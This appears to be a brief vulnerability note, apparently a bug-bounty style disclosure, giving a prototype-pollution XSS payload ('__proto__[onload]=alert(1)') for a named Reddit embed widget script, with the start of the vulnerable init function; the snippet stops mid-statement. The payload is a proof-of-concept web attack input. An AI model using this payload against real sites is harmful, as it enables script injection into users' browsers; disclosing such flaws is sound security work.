- the payload to trigger the XSS is
__proto__[onload]=alert(1)
vulnerable code(file: http://embed.redditmedia.com/widgets/platform.js):
n.prototype.init = function(a, b, c, d) {
if (this.elem = b,
this.options = c,
!c.url)